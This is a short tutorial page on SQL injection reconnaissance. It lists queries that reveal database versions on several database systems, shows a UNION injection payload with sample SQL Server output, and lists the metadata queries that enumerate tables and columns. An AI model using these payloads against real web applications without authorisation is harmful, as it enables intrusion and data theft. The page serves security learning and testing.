Examining the Database

Database Version

Different databases provide different ways of querying their version. You often need to try out different queries to find one that works, allowing you to determine both the type and version of the database software.

The queries to determine the database version for some popular database types are as follows:

Database typeQuery

Microsoft, MySQL

SELECT @@version

Oracle

SELECT * FROM v$version

PostgreSQL

SELECT version()

For example, you could use a UNION attack with the following input:

' UNION SELECT @@version--

This might return output like the following, confirming that the database is Microsoft SQL Server, and the version that is being used:

Microsoft SQL Server 2016 (SP2) (KB4052908) - 13.0.5026.0 (X64)
Mar 18 2018 09:11:49
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows Server 2016 Standard 10.0 <X64> (Build 14393: ) (Hypervisor)

information_schema

From MySQL 5.0, a default database named information_schema was added for providing database metadata, such as table names and column names. You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables;
// or
SELECT table_name FROM information_schema.tables;

Next, you can then query information_schema.columns to list the columns in individual tables:

SELECT * FROM information_schema.columns WHERE table_name = 'Users';
// or
SELECT column_name FROM information_schema.columns WHERE table_name = 'Users';

On Oracle, you can obtain the same information with slightly different queries. You can list tables by querying all_tables:

SELECT * FROM all_tables;
// or
SELECT table_name FROM all_tables;

And you can list columns by querying all_tab_columns:

SELECT * FROM all_tab_columns WHERE table_name = 'USERS';
// or
SELECT column_name FROM all_tab_columns WHERE table_name = 'USERS';

Reference

PreviousUNION AttacksNextBlind SQL Injection

Last updated